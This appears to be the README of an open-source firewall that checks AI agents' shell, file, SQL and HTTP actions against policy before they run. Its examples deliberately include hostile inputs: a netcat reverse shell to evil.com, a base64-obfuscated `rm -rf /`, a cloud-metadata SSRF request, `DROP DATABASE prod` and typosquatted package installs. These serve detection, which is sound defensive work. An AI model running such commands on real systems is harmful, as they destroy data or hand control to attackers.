Deterministic execution-level safety layer between AI agents and real systems (shell, files, SQL, HTTP).
AI Execution Firewall
Deterministic safety layer between AI agents and real systems. Gate shell commands, file edits, SQL queries, and HTTP requests through a policy pipeline before they execute.
Open source (MIT) — built in the open. Issues, PRs, and ideas all welcome.
AI → Action → Firewall → Decision → Execution
The firewall classifies intent, scores risk, applies YAML rules, simulates impact (unified diff for code, SQL AST findings, git context, SSRF / leaked-secret detection for URLs), and returns one of ALLOW / BLOCK / REQUIRE_APPROVAL. Every decision is appended to an audit log.
In v0.3.0 the firewall fades into the background for routine work: it remembers which commands you've approved, inherits permissions from what you just typed in your own terminal, parses commands semantically (catches echo "<base64>" | base64 -d | sh as the decoded rm -rf /), and runs destructive commands in a Docker dry-run sandbox before touching real disk.
v0.4.0 is the enterprise round — seven additions that move the firewall from "useful CLI for one dev" to "deployable in a regulated org": AI-SBOM validation against PyPI / npm / crates.io / RubyGems with typosquat detection, AI-native DLP (PII scanner alongside the existing secret scanner), network egress control (curl / wget / nc / socat route through the same gate as guard api), fine-grained RBAC via guard.toml with role inheritance and --as <role>, rule-based behavior analytics (rate burst, last-hour spike vs 24h median, quiet-hour outliers — anomalies downgrade ALLOW to REQUIRE_APPROVAL, never escalate BLOCK), SIEM-ready audit sinks (syslog / Splunk HEC / generic HTTPS webhook / stdout for vector / fluent-bit, all async with bounded queues), and cost & resource governance (rate limits, loop detection, daily API-byte budget).
v0.5.0 is the active interceptor release. The VS Code extension stops being a passive Command-Palette tool and becomes the gate. On first activation it shells out to guard mcp scan --json, surfaces a one-click consent toast, and (on user approval) installs the Claude Code PreToolUse hook into ~/.claude/settings.json and runs guard mcp install <server> for every detected MCP server. From then on, when an AI tool tries something risky, the firewall's existing pipeline runs as today — and on REQUIRE_APPROVAL it routes the Decision back to the extension's loopback HTTP server (127.0.0.1:<random>, token-authenticated via ~/.ai-firewall/extension.port) so the user gets the actual Decision in a webview and clicks Approve / Reject. The AI is paused ≤30s waiting; on timeout we fall back to safe-default BLOCK. 457 passing tests.
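The approval round trip above amounts to a bounded wait with a safe default. A minimal sketch of that idea, assuming a hypothetical `wait_for_verdict` helper and an in-process queue standing in for the extension's loopback HTTP server (neither is taken from the project's code):

```python
import queue

APPROVAL_TIMEOUT_S = 30.0  # mirrors the 30 s pause described above


def wait_for_verdict(replies: "queue.Queue[str]", timeout: float = APPROVAL_TIMEOUT_S) -> str:
    """Wait for the user's answer; fall back to BLOCK if none arrives in time."""
    try:
        answer = replies.get(timeout=timeout)
    except queue.Empty:
        return "BLOCK"  # safe default: no answer means no execution
    # Anything other than an explicit approval is treated as a rejection.
    return "ALLOW" if answer == "approve" else "BLOCK"
```

Treating every non-approval as BLOCK keeps the failure mode closed: a crashed webview, a malformed reply, and a timeout all end the same way.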
Install
Python package (PyPI):
pip install ai-execution-firewall
VS Code extension (Marketplace):
VS Code → Extensions panel → search "AI Execution Firewall" → Install
Or from the command line:
code --install-extension sk-dev-ai.ai-execution-firewall
Standalone binary (no Python required) — download guard-{linux,macos,macos-arm64,windows} from the latest release and put it on your PATH.
For development (editable install with test deps):
git clone https://github.com/Shahriyar-Khan27/ai_firewall.git
cd ai_firewall
pip install -e ".[dev]"
The smart-flow UX (new in v0.3.0)
The firewall used to prompt on every risky action. Users would turn it off after a week. v0.3.0 replaces that with a layered flow that gets quieter the more you use it:
| Step | Behaviour |
|---|---|
| 1 | Silent pass for safe (git status, ls, echo) — never prompts |
| 2 | Memory match → auto-approve repeats of previously-OK actions in the same project, with a quiet status-bar toast |
| 3 | Permission inheritance → auto-approve when the user just ran the same command themselves in the last 5 min |
| 4 | Semantic detection — even echo "<b64>" | base64 -d | sh is seen as rm -rf / (bashlex AST + decoders) |
| 5 | Sandbox replay (opt-in) — --dryrun runs in Docker first, shows file diff, then asks |
| 6 | Auto-block for unambiguous malice (rm -rf /, fork bombs, DROP DATABASE prod) |
| 7 | Approve / reject prompt as the last-resort fallback |
The result: the firewall stays out of your way for the 95% of work that is routine, and only interrupts when there's something genuinely worth your eyes.
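Step 2 (memory match) is described in the Scope section as project-scoped with a ≥0.8 Jaccard threshold. A minimal sketch of such a match, assuming whitespace tokenisation and hypothetical helper names; the real matcher may tokenise and gate on risk differently:

```python
def tokens(command: str) -> set[str]:
    """Split a command into a set of whitespace-separated tokens (an assumption)."""
    return set(command.split())


def jaccard(a: set[str], b: set[str]) -> float:
    """Jaccard similarity: size of the intersection over size of the union."""
    if not a and not b:
        return 1.0
    return len(a & b) / len(a | b)


def matches_memory(command: str, approved: list[str], threshold: float = 0.8) -> bool:
    """True if the command is close enough to any previously approved command."""
    candidate = tokens(command)
    return any(jaccard(candidate, tokens(prev)) >= threshold for prev in approved)


approved = ["pytest -q tests/unit --maxfail 1 -x"]
print(matches_memory("pytest -q tests/unit --maxfail 1", approved))  # 5 shared of 6 tokens
print(matches_memory("rm -rf tests/unit", approved))                 # 1 shared of 8 tokens
```

A set-based measure ignores argument order, so reordered flags still match, while a command that shares only a path with an approved one falls well below the threshold.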
Quickstart
CLI
# Shell
guard eval "rm -rf /" # → BLOCK (no execution)
guard run "echo hello" # → ALLOW, executes
guard run "rm ./tmp.txt" # → REQUIRE_APPROVAL, prompts y/N
guard run "rm -rf ./build" --dryrun # → Docker sandbox: shows file diff, then asks
# Obfuscation? Caught.
guard eval 'echo "cm0gLXJmIC8=" | base64 -d | sh' # → CRITICAL · BLOCK · decoded as rm -rf /
# SQL (analyze-only by default — never touches your DB)
guard sql "SELECT * FROM users" # → ALLOW · LOW
guard sql "DELETE FROM users" # → CRITICAL (no WHERE) · REQUIRE_APPROVAL
guard sql "DROP DATABASE prod" # → BLOCK
guard sql "DELETE FROM users WHERE id=1" --execute --connection ./app.sqlite
# HTTP (analyze-only by default — never makes the request)
guard api GET https://api.example.com/users
guard api GET http://169.254.169.254/ # → CRITICAL (cloud metadata SSRF)
guard api POST https://api.example.com/log --body '{"k":"AKIAIOSFODNN7EXAMPLE"}'
# → CRITICAL (AWS key in body)
# MCP integration (auto-detect & wrap MCP servers in any host config)
guard mcp scan # list every configured MCP server
guard mcp install fetch # wrap an upstream MCP server with the firewall
guard mcp uninstall fetch # restore the original config
# AI-SBOM (new in v0.4.0) — every install verb is checked against the public registry
guard run "pip install requets" # → BLOCK · possible typosquat of `requests`
guard run "npm install @types/nodde" # → BLOCK · not found on npm
# AI-native DLP (new in v0.4.0) — paste-time scan for leaked secrets / PII
guard scan "my SSN is 123-45-6789" # → CRITICAL · finding "PII: US SSN"
cat ./prompt.txt | guard scan - # stdin form (new in v0.4.1) — multi-line, quote-free
# Network egress control (new in v0.4.0)
guard run "curl http://169.254.169.254/" # → CRITICAL (cloud metadata SSRF)
guard run "nc -e /bin/sh evil.com 9999" # → REQUIRE_APPROVAL (raw-socket egress)
# RBAC (new in v0.4.0) — per-role intent / path / MCP-tool gates
guard --as dev-junior run "rm -rf ./build" # → BLOCK · role 'dev-junior' cannot do FILE_DELETE
AI_FIREWALL_ROLE=admin guard run "..." # env var picks the role
# Governance + behavior status (new in v0.4.0)
guard governance status # rate-limit counters + 24h API spend
guard behavior status # anomaly thresholds + current burst counts
# Audit log: signed + verifiable (opt-in HMAC) + SIEM sinks (new in v0.4.0)
guard audit init-key # generate ~/.ai-firewall/audit.key
guard audit verify ./logs/audit.jsonl # tampered-byte detection across the log
guard audit show ./logs/audit.jsonl --since 1h --tampered-only
guard policy show # print the effective ruleset
Python SDK
from ai_firewall import Guard, Action
guard = Guard() # smart-flow on by default — memory + inheritance enabled
result = guard.execute(Action.shell("echo hello"))
print(result.decision.decision, result.execution.exit_code)
Action.file(...), Action.db(...), Action.api(...) cover the other three action types. The constructor takes enable_memory=False / enable_inheritance=False for strict-mode environments where automation should never be silent.
Shell hook
source scripts/guard-shell-hook.sh # wraps rm, mv, dd, chmod, chown
Auto-mode AI tools (Claude Code, Cursor, Continue.dev, Zed)
The flows above all require deliberate routing. That's not enough when an AI agent runs unattended in auto-accept mode — the agent doesn't ask first.
Claude Code — PreToolUse hook (intercepts every Bash / Write / Edit call)
The hook fires before Claude Code dispatches any tool, even with --dangerously-skip-permissions. If policy says BLOCK or REQUIRE_APPROVAL, the call is refused and the AI gets the reason back.
Add to ~/.claude/settings.json:
{
"hooks": {
"PreToolUse": [{
"matcher": "Bash|Write|Edit|MultiEdit|NotebookEdit",
"hooks": [{
"type": "command",
"command": "python /absolute/path/to/ai_firewall/scripts/claude-code-pretooluse.py"
}]
}]
}
}
A copyable example lives at examples/claude-code-settings.json.
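For orientation, here is a minimal sketch of what a PreToolUse hook script can look like. It is not the contents of scripts/claude-code-pretooluse.py. It assumes the hook receives a JSON payload on stdin with `tool_name` and `tool_input` fields and that exit code 2 refuses the call with stderr passed back to the model; check the Claude Code hooks documentation before relying on either. The `review` helper and the single deny pattern are hypothetical.

```python
import json
import re
import sys

# Illustrative deny list only; the real hook delegates to the firewall pipeline.
BLOCKED = [re.compile(r"rm\s+-rf\s+/(\s|$)")]


def review(payload: dict) -> tuple[int, str]:
    """Return (exit_code, reason). 0 lets the call through, 2 refuses it."""
    if payload.get("tool_name") != "Bash":
        return 0, ""
    command = str((payload.get("tool_input") or {}).get("command", ""))
    for pattern in BLOCKED:
        if pattern.search(command):
            return 2, f"blocked by policy: {command!r}"
    return 0, ""


def main() -> int:
    """Read the hook payload from stdin and report the reason on stderr."""
    code, reason = review(json.load(sys.stdin))
    if reason:
        print(reason, file=sys.stderr)
    return code
```

A script installed as a hook would end with `raise SystemExit(main())`; it is left out here so the functions can be imported and tested without consuming stdin.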
MCP — wrap any MCP-capable host (Claude Code, Cursor, Continue, Zed, Cline, …)
pip install "ai-execution-firewall[mcp]"
Manual (drop in your client's mcp.json):
{
"mcpServers": {
"ai-firewall": {"command": "guard", "args": ["mcp"]}
}
}
Automatic — let the firewall scan and wrap your existing MCP servers:
guard mcp scan # list what's configured
guard mcp install fetch # rewrites the mcp.json to route 'fetch' through the firewall
After wrapping, every tools/call JSON-RPC request from the host runs through Guard.evaluate first. BLOCK and REQUIRE_APPROVAL responses are returned to the host as tool errors — the upstream MCP server is never reached for risky calls. Heuristic argument-shape mapping handles the common conventions (command, file_path, sql, url).
VS Code extension
After installing from the Marketplace, the extension auto-detects which AI tools you have configured (Claude Code via ~/.claude/settings.json, every MCP-aware host via guard mcp scan --json) and offers a one-click toast to wire firewall protection into all of them. From then on, when an AI tries something risky, the existing approval webview pops up automatically — no manual invocation needed. (new in v0.5.0)
The Command Palette (Ctrl+Shift+P) gives you these manual commands under AI Firewall:
- Detect & Wire AI Tools / Unwire All AI Tools (new in v0.5.0) — re-arm or reverse the auto-wire flow
- Show Status (new in v0.5.0) — markdown summary of wired hosts + last 20 audit decisions
- Run Shell Command… / Evaluate Selected Text as Shell Command
- Evaluate SQL Query… / Evaluate Selected Text as SQL
- Evaluate HTTP Request…
- Show Effective Policy
- Show Recent Secret-DB Activity (v0.3.0, passive watcher for state.vscdb modifications)
- Scan Text for Secrets and PII… / Scan Selection for Secrets and PII (v0.4.0)
- Show Governance Status / Show Behavior Status (v0.4.0)
Risky actions open a themed approval webview with the risk badge, intent / decision pills, findings list, git context, and a syntax-coloured unified diff. Smart-flow auto-approvals (memory or inheritance match) instead surface a quiet status-bar toast — no webview, no friction. See vscode-extension/README.md for build / debug / packaging instructions.
Pipeline
Every guard.execute(action) call runs:
- RBAC pre-pass (new in v0.4.0): load ~/.ai-firewall/guard.toml (or per-project .guard.toml), pick the active role (priority: --as flag → AI_FIREWALL_ROLE env → default_role → "dev"), and check intent / file glob / MCP-tool deny lists. DENY is final BLOCK.
- Governance pre-pass (new in v0.4.0): a rolling-window check on the audit log covering rate limit per intent, loop detection (same normalized command repeated), and 24h API-byte budget. BLOCK on first violation.
- Intent classifier: bashlex AST / SQL parse / URL parse → one of FILE_DELETE | FILE_WRITE | FILE_READ | SHELL_EXEC | CODE_MODIFY | DB_READ | DB_WRITE | DB_DESTRUCTIVE | API_READ | API_WRITE | API_DESTRUCTIVE | NETWORK_EGRESS. Multi-command shells take the worst of every effective command; obfuscation (base64/hex/printf decoding) bumps a baseline HIGH risk regardless of what's inside; curl / wget / nc / socat / scp route to API_* / NETWORK_EGRESS (new in v0.4.0).
- Risk analyzer: table lookup on intent + feature flags → LOW | MEDIUM | HIGH | CRITICAL
- Policy engine: YAML rules → ALLOW | BLOCK | REQUIRE_APPROVAL (first pass)
- Impact engine: best-effort dry-run:
  - Files: glob expansion, file stat, unified diff, AST findings (removed funcs / tests, auth identifiers), git context (uncommitted, untracked, gitignored)
  - SQL: sqlglot AST → DELETE/UPDATE without WHERE, DROP DATABASE/SCHEMA/TABLE, TRUNCATE, GRANT/REVOKE, multiple statements
  - HTTP: cloud metadata endpoints, private/loopback hosts (SSRF), URL credentials, secrets in query string, non-HTTP schemes, destructive paths; body + Authorization-header secret + PII scanning (v0.4.0 DLP: emails, US SSN, Luhn-validated CCs, E.164/US phone, IBAN, high-entropy tokens); body + headers checked for AWS / GitHub / Slack / Stripe / Google / Anthropic / OpenAI / PEM keys / JWTs
  - Shell installs (new in v0.4.0): pip install / npm install / cargo install / gem install verify the package against the public registry; unknown packages → CRITICAL, typosquats of top-100 packages → HIGH
- Risk bump: impact findings can raise risk and re-trigger policy
- Smart-flow (v0.3.0): when policy says REQUIRE_APPROVAL, check inheritance (did the user just run an equivalent command in their own terminal?) and memory (have they approved this kind of thing in this project before?). Either match downgrades to ALLOW with a status-bar toast. BLOCK is never downgraded.
- Behavior pass (new in v0.4.0): three rule-based heuristics on the audit log: rate burst (per-intent count in N seconds), rate spike (last hour vs 24h median), quiet-hour outlier (intent appearing in a historically-zero hour-of-day). An anomaly downgrades ALLOW into REQUIRE_APPROVAL; it never escalates BLOCK or upgrades approval.
- Decision engine: combines verdict + risk + impact
BLOCK raises immediately. REQUIRE_APPROVAL invokes the approval function (CLI prompt or VS Code webview). ALLOW runs through the matching adapter.
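The interaction between the policy verdict, smart-flow, and the behavior pass can be sketched as a small function. This is one reading of the stage order listed above, not the decision engine itself; `Signals`, `bump_risk`, and `final_verdict` are hypothetical names.

```python
from dataclasses import dataclass

RISK_ORDER = ("LOW", "MEDIUM", "HIGH", "CRITICAL")


def bump_risk(current: str, finding: str) -> str:
    """Risk bump: an impact finding can raise the risk level, never lower it."""
    return max(current, finding, key=RISK_ORDER.index)


@dataclass
class Signals:
    policy_verdict: str            # ALLOW | BLOCK | REQUIRE_APPROVAL
    trusted_repeat: bool = False   # smart-flow: memory or inheritance match
    anomaly: bool = False          # behavior pass: any heuristic fired


def final_verdict(signals: Signals) -> str:
    """Combine the stages in the order the pipeline lists them."""
    verdict = signals.policy_verdict
    if verdict == "BLOCK":
        return verdict  # BLOCK is never downgraded
    if verdict == "REQUIRE_APPROVAL" and signals.trusted_repeat:
        verdict = "ALLOW"  # smart-flow downgrade
    if verdict == "ALLOW" and signals.anomaly:
        verdict = "REQUIRE_APPROVAL"  # behavior pass asks for a human again
    return verdict
```

Under this ordering a remembered command that suddenly arrives in a burst still prompts, because the behavior pass runs after smart-flow.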
Every evaluated action is appended to logs/audit.jsonl — optionally HMAC-SHA256 signed (see guard audit init-key) and broadcast to any configured SIEM sinks (new in v0.4.0 — syslog / Splunk HEC / generic HTTPS webhook / stdout, all async with bounded queues).
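To illustrate what HMAC-SHA256 signing of a JSONL audit line involves, here is a minimal sketch using only the standard library. The envelope layout (`record` plus `hmac`) and the function names are assumptions for illustration; the project's on-disk format may differ.

```python
import hashlib
import hmac
import json


def _canonical(record: dict) -> bytes:
    """Serialise deterministically so signer and verifier hash the same bytes."""
    return json.dumps(record, sort_keys=True, separators=(",", ":")).encode("utf-8")


def sign_record(record: dict, key: bytes) -> str:
    """Return one JSONL line carrying the record and its HMAC-SHA256 tag."""
    tag = hmac.new(key, _canonical(record), hashlib.sha256).hexdigest()
    return json.dumps({"record": record, "hmac": tag}, sort_keys=True)


def verify_line(line: str, key: bytes) -> bool:
    """True only if the line parses and its tag matches the record."""
    try:
        envelope = json.loads(line)
        record, claimed = envelope["record"], envelope["hmac"]
    except (ValueError, KeyError, TypeError):
        return False
    if not isinstance(record, dict) or not isinstance(claimed, str):
        return False
    expected = hmac.new(key, _canonical(record), hashlib.sha256).hexdigest()
    # Constant-time comparison avoids leaking how many characters matched.
    return hmac.compare_digest(expected.encode("utf-8"), claimed.encode("utf-8"))
```

Signing each line independently detects edits to a line but not deletion of whole lines; catching that would need a chained or sequence-numbered scheme, which this sketch does not attempt.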
Adapters
| Action type | Default adapter | Opt-in execute adapter |
|---|---|---|
| shell | ShellAdapter (subprocess) | DockerSandboxAdapter via --dryrun (Feature F) |
| file | FileAdapter (pathlib) | (none) |
| db | DBAnalyzeAdapter (never opens a DB) | SQLiteExecuteAdapter via --execute --connection <sqlite-path> |
| api | APIAnalyzeAdapter (never sends a request) | HTTPExecuteAdapter via --execute (stdlib urllib) |
DB and API default to analyze-only so the firewall never touches your database or network unless you explicitly opt in. Sandbox dry-run is opt-in for shell and runs your command in a disposable container against a snapshot of the workdir, then surfaces the file diff before letting you confirm.
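Analyze-only works for HTTP because most of the listed checks need only the URL text. A minimal sketch of a few of them (metadata endpoints, loopback and private hosts, URL credentials, non-HTTP schemes), assuming a hypothetical `ssrf_findings` helper; it does not resolve DNS names, so a hostname that points at a private address is not caught here.

```python
import ipaddress
from urllib.parse import urlsplit

# Well-known cloud metadata endpoints (not an exhaustive list).
METADATA_HOSTS = {"169.254.169.254", "metadata.google.internal"}


def ssrf_findings(url: str) -> list[str]:
    """Inspect a URL without sending anything and list what looks risky."""
    parts = urlsplit(url)
    findings: list[str] = []
    if parts.scheme not in ("http", "https"):
        findings.append("non-HTTP scheme")
    if parts.username or parts.password:
        findings.append("credentials in URL")
    host = (parts.hostname or "").lower()
    if host in METADATA_HOSTS:
        findings.append("cloud metadata endpoint")
    elif host == "localhost":
        findings.append("loopback host")
    else:
        try:
            ip = ipaddress.ip_address(host)
        except ValueError:
            ip = None  # a DNS name; this sketch does not resolve it
        if ip is not None and (ip.is_loopback or ip.is_private or ip.is_link_local):
            findings.append("private or loopback address")
    return findings


print(ssrf_findings("http://169.254.169.254/"))
print(ssrf_findings("https://api.example.com/users"))
```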
Custom rules
Pass --rules path/to/rules.yaml (CLI) or Guard(rules_path=...) (SDK). See ai_firewall/config/default_rules.yaml for the schema:
shell_exec:
blocked:
- 'rm\s+-rf\s+/'
require_approval:
risk_at_or_above: HIGH
file_delete:
require_approval: true
db_destructive:
blocked:
- 'DROP\s+DATABASE'
require_approval: true
api_destructive:
require_approval: true
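One way to read the schema above: `blocked` holds regular expressions that force BLOCK, and `require_approval` is either a flat boolean or a risk floor. The sketch below mirrors the YAML as a Python dict so it runs without a YAML parser. The evaluation order, the case-insensitive matching, and the name `apply_rules` are assumptions, not the policy engine's actual behaviour.

```python
import re

RISK_ORDER = ["LOW", "MEDIUM", "HIGH", "CRITICAL"]

# The YAML rules above, written out as the dict a YAML loader would produce.
RULES = {
    "shell_exec": {
        "blocked": [r"rm\s+-rf\s+/"],
        "require_approval": {"risk_at_or_above": "HIGH"},
    },
    "file_delete": {"require_approval": True},
    "db_destructive": {"blocked": [r"DROP\s+DATABASE"], "require_approval": True},
    "api_destructive": {"require_approval": True},
}


def apply_rules(intent: str, text: str, risk: str, rules: dict = RULES) -> str:
    """Return ALLOW, BLOCK, or REQUIRE_APPROVAL for one classified action."""
    section = rules.get(intent.lower(), {})
    for pattern in section.get("blocked", []):
        if re.search(pattern, text, flags=re.IGNORECASE):
            return "BLOCK"
    gate = section.get("require_approval", False)
    if gate is True:
        return "REQUIRE_APPROVAL"
    if isinstance(gate, dict):
        floor = gate.get("risk_at_or_above", "CRITICAL")
        if RISK_ORDER.index(risk) >= RISK_ORDER.index(floor):
            return "REQUIRE_APPROVAL"
    return "ALLOW"  # intents with no section fall through in this sketch
```

Checking `blocked` before `require_approval` means a deny pattern always wins, which matches the Quickstart where `DROP DATABASE prod` is a BLOCK even though `db_destructive` also requires approval.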
Scope
Shipped (v0.4.0):
- Phase 1: shell + filesystem, rule-based classifier, CLI prompt approval, CLI / SDK / shell-hook surfaces.
- Phase 2: unified diff for code edits, AST-aware risk findings, git-aware impact, VS Code extension with webview approval UI.
- Phase 3: SQL gating via sqlglot, HTTP gating via stdlib urllib, secret-scanning of request bodies and Authorization-style headers, opt-in execute adapters for SQLite and HTTP.
- v0.3.0 (smart-flow & distribution):
  - Semantic command parsing (bashlex) with obfuscation decoding
  - Approved-pattern memory (project-scoped, risk-gated, ≥0.8 Jaccard)
  - Permission inheritance from bash / zsh / fish / PowerShell history
  - HMAC-SHA256-signed audit trails + guard audit verify
  - Docker sandbox replay (--dryrun)
  - MCP transparent proxy with auto-detect (guard mcp install / uninstall)
  - PyInstaller standalone binary (no Python prerequisite)
  - VS Code passive Cursor secret-DB watcher
- v0.4.0 (enterprise round; single release, 7 features):
  - AI-SBOM validation against PyPI / npm / crates.io / RubyGems with Damerau-Levenshtein typosquat detection
  - AI-native DLP: PII scanner (email, US SSN, Luhn-validated CCs, E.164/US phone, IBAN, high-entropy tokens) bolted onto every existing secret-scan channel; new guard scan CLI for paste-time checks
  - Network egress control: curl / wget / httpie route through the API gate; nc / socat / telnet / scp / rsync classify as NETWORK_EGRESS
  - Fine-grained RBAC: ~/.ai-firewall/guard.toml (and per-project .guard.toml override) with role inheritance, intent / file-glob / MCP-tool allow-deny lists, --as <role> flag
  - Behavior analytics: three rule-based anomaly heuristics (rate burst, rate spike, quiet-hour outlier) reading the audit log; only ever downgrades ALLOW to REQUIRE_APPROVAL
  - SIEM-ready audit sinks: JsonlFileSink (default, sync) + async SyslogSink (RFC 5424), SplunkHECSink, HttpsSink, StdoutSink (vector / fluent-bit pipe), all bounded-queue with daemon workers
  - Cost & resource governance: per-intent rate limits, loop detection (same normalized command repeated), and 24h API-byte budget; guard governance status + guard behavior status CLIs
Out / future:
- Postgres / MySQL execute adapters (currently SQLite only)
- Firecracker / gVisor sandbox backends (Docker first)
- Cloud control plane / web dashboard
- Team policy distribution
- LLM SDK middleware-style DLP (intercept openai.chat.completions.create() directly)
- Statistical / ML-based behavior models (per-project z-score baselines, trained anomaly detectors)
- OS-level network firewall integration (iptables / Windows Filter Platform)
Tests
pytest -q
457 tests + 1 skipped (Docker round-trip skips when no daemon). CI runs the full suite on Python 3.11 / 3.12 / 3.13 on every push, plus PyInstaller binary builds on tag push.
Release flow
Pushing a tag matching v* automatically:
- runs the full test matrix on GitHub Actions,
- builds sdist + wheel,
- publishes to PyPI via Trusted Publishing (no API token in CI),
- builds standalone PyInstaller binaries for Linux / macOS / macOS-arm64 / Windows and attaches them to the GitHub release.
# Bump version in pyproject.toml + ai_firewall/__init__.py, refresh
# README.md and CHANGELOG.md, commit, then:
git tag -a v0.4.0 -m "v0.4.0"
git push --tags
# PyPI is updated within ~60 seconds; binaries within ~5 minutes.
VS Code Marketplace publishing is currently manual — re-build the .vsix (npx vsce package --no-yarn from vscode-extension/) and upload via the Marketplace publisher manage page.
Contributing
This project is fully open source under the MIT license. Contributions of any size are welcome.
Good first issues to pick up:
- New SBOM registries (Composer / NuGet / Go modules): extends ai_firewall/engine/package_registry.py
- Postgres / MySQL execute adapters: currently SQLite is the only real-execute path
- Additional MCP host detectors: Zed, Cline, Aider have evolving config layouts
- Translations / docs polish: README, CHANGELOG, in-CLI help
- New PII patterns: extend ai_firewall/engine/pii_scan.py (regex + Luhn-style validators welcome)
- Statistical / ML behaviour models on top of the audit log: engine/behavior.py is currently rule-based
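For contributors new to checksum validators, a Luhn check is the kind of helper a PII pattern can pair with a regex to cut false positives. A minimal standalone sketch follows; the function name and the 13 to 19 digit length bounds are assumptions, and it is not copied from pii_scan.py.

```python
def luhn_valid(number: str) -> bool:
    """Validate a card-like number with the Luhn checksum."""
    stripped = number.replace(" ", "").replace("-", "")
    if not (stripped.isascii() and stripped.isdigit()):
        return False
    if not 13 <= len(stripped) <= 19:
        return False
    total = 0
    # Walk from the rightmost digit; double every second digit.
    for index, char in enumerate(reversed(stripped)):
        digit = int(char)
        if index % 2 == 1:
            digit *= 2
            if digit > 9:
                digit -= 9  # same as summing the two digits of the product
        total += digit
    return total % 10 == 0


print(luhn_valid("4111 1111 1111 1111"))  # True (a widely used test number)
print(luhn_valid("4111 1111 1111 1112"))  # False
```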
How to contribute:
git clone https://github.com/Shahriyar-Khan27/ai_firewall.git
cd ai_firewall
pip install -e ".[dev]"
pytest -q # confirm 457 tests pass
# make your change, add a test, push a branch, open a PR
Run pytest before opening a PR. CI will re-run on Python 3.11 / 3.12 / 3.13. New features land with tests; we don't merge regressions.
Bugs / questions / feature requests: open an issue at https://github.com/Shahriyar-Khan27/ai_firewall/issues. For security-relevant findings, see SECURITY.md if present, or email the maintainer privately.
Star the repo if it's useful — it's the simplest signal that this kind of safety tooling matters and is worth maintaining.
Links
- PyPI: https://pypi.org/project/ai-execution-firewall/
- VS Code Marketplace: https://marketplace.visualstudio.com/items?itemName=sk-dev-ai.ai-execution-firewall
- GitHub repo: https://github.com/Shahriyar-Khan27/ai_firewall
- GitHub releases: https://github.com/Shahriyar-Khan27/ai_firewall/releases
- Issues: https://github.com/Shahriyar-Khan27/ai_firewall/issues
- CHANGELOG: CHANGELOG.md
License
MIT — see LICENSE. Free for commercial and personal use, in any context, with attribution.